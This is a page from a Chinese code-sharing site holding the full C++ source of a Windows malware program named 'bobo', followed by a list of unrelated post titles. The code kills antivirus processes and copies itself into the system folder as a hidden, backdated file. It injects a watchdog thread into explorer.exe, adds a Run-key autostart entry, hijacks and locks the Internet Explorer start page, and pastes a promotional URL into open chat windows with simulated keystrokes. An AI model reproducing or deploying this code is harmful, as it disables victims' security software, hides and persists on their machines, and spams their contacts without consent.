tt
来源:互联网 发布:淘宝买的vr效果怎么样 编辑:程序博客网 时间:2024/05/01 00:27
// boboDlg.cpp : 实现文件
//
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <stdio.h>
#include "stdafx.h"
#include "bobo.h"
#include "boboDlg.h"
#include "atlbase.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
void EnableDebugPriv();
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname);
DWORD WINAPI watch(LPVOID pvparam);
TCHAR *name1=_T("//bobo.exe");
TCHAR *name2=_T("//kernel.dll");
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
DWORD byte_write;
DWORD GetID(char *szName);
int k=0;
int jj=0;
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// 对话框数据
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
// 实现
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CboboDlg 对话框
CboboDlg::CboboDlg(CWnd* pParent /*=NULL*/)
: CDialog(CboboDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CboboDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CboboDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_WM_TIMER()
ON_MESSAGE(WM_HOTKEY,OnHotKey)
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
// CboboDlg 消息处理程序
BOOL CboboDlg::OnInitDialog()
{
CDialog::OnInitDialog();
EnableDebugPriv();
HANDLE han11,han22;
han11=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han22=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
if(han11!=NULL)
{
::TerminateProcess(han11,0);
}
if(han22!=NULL)
{
::TerminateProcess(han22,0);
}
SetTimer(0,30000,NULL);
int ret;
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR curname[MAX_PATH];
TCHAR ctname[MAX_PATH];
TCHAR ckname[MAX_PATH];
TCHAR syspath[MAX_PATH];
GetSystemDirectory(syspath,MAX_PATH);
_tcscpy(ctname,syspath);
_tcscat(ctname,name1);
_tcscpy(ckname,syspath);
_tcscat(ckname,name2);
HINSTANCE hhb;
hhb=(HINSTANCE)::GetWindowLong(NULL,DWL_USER);
::GetModuleFileName(hhb,curname,MAX_PATH);
ffhandle=FindFirstFile(ctname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(!CopyFile(curname,ctname,TRUE))
{
return -1;
}
}
else if(!FindClose(ffhandle))
{
return -1;
}
ffhandle=FindFirstFile(ckname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
if(!CopyFile(curname,ckname,TRUE))
{
return -1;
}
fchandle=CreateFile(ckname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
return -1;
}
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
return -1;
}
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
return -1;
}
if(!SetFileAttributes(ckname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
return -1;
}
CloseHandle(fchandle);
}
else
{
return -1;
}
}
else if(!FindClose(ffhandle))
{
return -1;
}
HANDLE hthread,wthread;
hthread=CreateRemote(ctname,ckname);
wthread=CreateThread(NULL,0,watch,(LPVOID)hthread,0,NULL);
// 将/“关于.../”菜单项添加到系统菜单中。
// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标
// TODO: 在此添加额外的初始化代码
return TRUE; // 除非设置了控件的焦点,否则返回 TRUE
}
void CboboDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// 如果向对话框添加最小化按钮,则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,
// 这将由框架自动完成。
void CboboDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// 使图标在工作矩形中居中
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// 绘制图标
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
LRESULT CboboDlg::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam)
{
if(message==133)
{
ShowWindow(SW_HIDE);
}
return CDialog::DefWindowProc(message, wParam, lParam);
}
//当用户拖动最小化窗口时系统调用此函数取得光标显示。
HCURSOR CboboDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
typedef struct _RemotePara{//参数结构
char pMessageBox[12];
DWORD dwMessageBox;
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
DWORD rpmousepid;
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
char rpwinexecname[MAX_PATH];
WIN32_FIND_DATA rpfdata;
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}RemotePara, *PREMOTEPARAMETER;
//远程线程
DWORD __stdcall ThreadProc (LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数
MMessageBoxA myMessageBoxA;
myMessageBoxA =(MMessageBoxA) erp->dwMessageBox ;//得到函数入口地址
typedef VOID (__stdcall *EOutputDebugString)(LPCTSTR);
typedef HANDLE (__stdcall *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (__stdcall *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (__stdcall *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (__stdcall *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (__stdcall *EFindClose)(HANDLE);
typedef UINT (__stdcall *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=(HANDLE)tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
return -1;
}
if((tWinExec(erp->rptname, 0))<32)
{
return -1;
}
return 0;
}
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
_tprintf(_T("GetSystemDirectory in watch Error: %d/n"),GetLastError());
return -1;
}
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
ret=RegQueryValueEx(hkey,_T("bobo"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
ret=RegSetValueEx(hkey,_T("bobo"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
}
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=CreateRemote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname)
{
const DWORD THREADSIZE=1024*4;
HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,::GetID("explorer.exe"));
if(!hWnd)return 0;
void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)
{
MessageBox(NULL,"1","1",0);
return 0;
}
if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))
{
MessageBox(NULL,"21","21",0);
}
//再付值
RemotePara rp;
::ZeroMemory(&rp,sizeof(rp));
HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
HINSTANCE hkernel32=::LoadLibrary("kernel32.dll");
{ const DWORD THREADSIZE=1024*4;
rp.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
strcpy(rp.pMessageBox,"hello/0");
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,(LPCWSTR)ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileA");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileA");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
//写进目标进程
RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面属性
if(!pRemotePara)
return 0;
if(!::WriteProcessMemory (hWnd,pRemotePara,&rp,sizeof(rp),0))
{::MessageBox(NULL,"a","b",0);
return 0;
}
//启动线程
HANDLE hThread = ::CreateRemoteThread(hWnd,0,0,(DWORD(__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
if(!hThread)
{
::MessageBox(NULL,"a","a",0);
return 0;
}
return hThread;
}
//提升权限
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
void PasteText()
{
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
HGLOBAL hMem;
LPTSTR pStr;
// 分配内存空间
hMem = GlobalAlloc(GMEM_SHARE, sizeof(g_str));
pStr = (LPSTR)GlobalLock(hMem);
lstrcpy(pStr, g_str);
GlobalUnlock(hMem);
OpenClipboard(NULL);
EmptyClipboard();
// 设置剪贴板文本
SetClipboardData(CF_TEXT, hMem);
CloseClipboard();
GlobalFree(hMem);
::keybd_event(0x11,0,0,0);
::keybd_event(0x56,0,0,0);
::keybd_event(0x56,0,KEYEVENTF_KEYUP,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
Sleep(500);
}
LONG CboboDlg::OnHotKey(WPARAM wParam,LPARAM lParam)
{
char szTitle[256];
char *c="聊天中";
char *cc;
HWND hWnd=::GetForegroundWindow();
::SendMessage(hWnd,WM_GETTEXT,255,(long)szTitle);
cc=::strpbrk(szTitle,c);
if(cc)
{
PasteText();
::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
else
{
::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
return 0;
}
HKEY str0=HKEY_CURRENT_USER;
CString str1="Software//Policies//Microsoft//Internet Explorer//Control Panel";
void Creg()
{
CRegKey reg;
reg.Open(str0,str1,KEY_READ|KEY_WRITE);
reg.SetDWORDValue("HomePage",1);
reg.Close();
reg.Open(str0,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
reg.Open(HKEY_LOCAL_MACHINE,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
ShellExecute(NULL,"open","C://Program Files//Internet Explorer//iexplore.exe",NULL,NULL,1);
}
void CboboDlg::OnTimer(UINT nIDEvent)
{
jj++;
HANDLE han1,han2;
han1=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han2=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
if(han1!=NULL)
{
::TerminateProcess(han1,0);
}
if(han2!=NULL)
{
::TerminateProcess(han2,0);
}
if(k==0)
{
k=RegisterHotKey(GetSafeHwnd(),0,MOD_CONTROL,0x0D);
}
if(jj==0)
{
Creg();
if(jj==6)
{
jj=0;
}
}
}
- tt
- tt
- tt
- tt
- tt
- tt
- tt
- TT
- TT
- tt
- tt
- tt
- TT
- tt
- TT
- tt
- TT
- tt
- 浅析杀毒软件开发原理(之查毒引擎)
- gitWeb v1.5.2 Remote Command Execution
- 常用系列函数2
- 名称以无效字符开头。处理资源解决办法
- 嵌入式GUI FTK支持输入法
- tt
- 用户控件在分页下的解决方案
- JDeveloper的打包问题(二)
- PostTest
- 使用HttpWebRequest提交信息
- 游泳姿势与性格的关系
- UploadMessage
- web.xml
- NTDDI_VERSION,_WIN32_WINNT,WINVER,_WIN32_IE等宏含义
